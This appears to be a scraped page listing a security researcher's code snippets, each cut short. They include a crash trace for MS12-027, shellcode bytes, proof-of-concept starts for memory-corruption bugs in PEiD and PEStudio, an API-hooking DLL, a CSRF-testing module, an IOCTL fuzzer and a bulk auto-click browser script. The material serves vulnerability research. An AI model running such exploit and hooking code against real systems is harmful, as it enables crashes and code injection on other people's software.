Debasish Mandal debasishm89
debasishm89 / MS12-027 Crash Analysis
Created July 21, 2012 22:10 — forked from abhisek/MS12-027 Crash Analysis
MS12-027 Analysis: Encrypted Word Document Structure
Crash Stack Trace:
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012eaa0 275c8a0a 0012eacc 00208008 00008282 MSCOMCTL!DllGetClassObject+0x41a87
0012ead4 27583c30 00000000 01000000 c279eb90 MSCOMCTL!DllGetClassObject+0x41cc6
00000000 00000000 00000000 00000000 00000000 MSCOMCTL!DllCanUnloadNow+0xc7d
from pefile import PE
from struct import pack
# windows/messagebox - 265 bytes
# http://www.metasploit.com
# ICON=NO, TITLE=W00t!, EXITFUNC=process, VERBOSE=false,
# TEXT=Debasish Was Here!
sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
# Title: PEStudio Version 3.69 Denial of Service
# Date: 5th June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Software Homepage: http://www.winitor.com/
# Version: PEStudio Version 3.69
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Recently released stable version (v6.91) is not affected.
'''
; Sample shellcode that will pop a MessageBox
; with custom title and text
; Written by Peter Van Eeckhoutte
; http://www.corelan.be:8800
[Section .text]
[BITS 32]
global _start
debasishm89 / peid-poc.py
Last active December 22, 2015 01:08
PEiD 0.95 - Memory Corruption POC
#POC
#c:\python27
junk = "\x41"
header = "MZ"
header += junk * 58
header += "\x80"
header += "\x00" * 3
header += junk * 64
header += "PE"
header += "\x00"*2
debasishm89 / inlinehookdll.c
Last active October 5, 2019 05:59
DLL code for Inline Hooking MessageBoxW API of User32.dll
#include <windows.h>
__declspec(naked) EvilFunction()
{
/*
0007FA18 01001FC4 Ä. /CALL to MessageBoxW from notepad.01001FBE
0007FA1C 001503C8 È. |hOwner = 001503C8 ('Find',class='#32770',parent=003C029E)
0007FA20 000A3A88 ˆ:.. |Text = "Cannot find "junk""
0007FA24 000A8F34 4.. |Title = "Notepad"
0007FA28 00000040 @... \Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
*/
debasishm89 / fbxsrf.py
Last active July 24, 2017 09:08
This Burpy (https://github.com/debasishm89/burpy) module is specially written to find CSRF vulnerabilities in the Facebook application.
from rawweb import *
def main(raw_stream,ssl):
'''
This Burpy module is specially written to find CSRF vulnerabilities in the Facebook application.
It has already found a few minor CSRF vulnerabilities in the FB application; a few of them qualified for the Bug Bounty.
It simply checks whether CSRF token validation is present on the server side or not by removing the token
from the request and replaying it. The Facebook application always throws a generic error message for a CSRF error, which is
"Please try closing and re-opening your browser". If this error is not present in the response after removing the token,
it returns +ve.
'''
import re
import sys
import pefile
from pydbg import *
from pydbg.defines import *
def parseidalog(file):
all_funcs = []
f = open(file)
funcs = f.readlines()
var tok = window.setInterval(function() {
var total_req = 100; // change to 200, 300 etc. to send requests to that many people at once; may slow down the network
var all = document.getElementsByClassName('vcard-button bt-connect bt-primary')
if (all.length < total_req)
document.body.scrollTop = document.body.scrollHeight;
else{
clearInterval(tok);window.scrollTo(0,0);
for(var i = 0 ; i < all.length; i++){ // was i <= all.length, which reads one past the end of the collection
all[i].click();}
}}, 2000);
debasishm89 / inmemory-ioctl-fuzzer-logger.py
Last active October 30, 2022 16:25
A mutation-based usermode dumb IOCTL fuzzer/logger. This Python script hooks DeviceIoControl!Kernel32 and tries to dump every I/O control code, I/O buffer pointer and I/O buffer length. It can also fuzz the I/O buffer size and content with junk.
'''
Author : Debasish Mandal
Blog :http://www.debasish.in/
Twitter : https://twitter.com/debasishm89
A mutation-based user mode (ring3) dumb in-memory IOCTL fuzzer/logger.
This script attaches itself to any given process, hooks the DeviceIoControl!Kernel32 API and
tries to log or fuzz all I/O control codes, I/O buffer pointers and I/O buffer lengths that the
process sends to any kernel driver.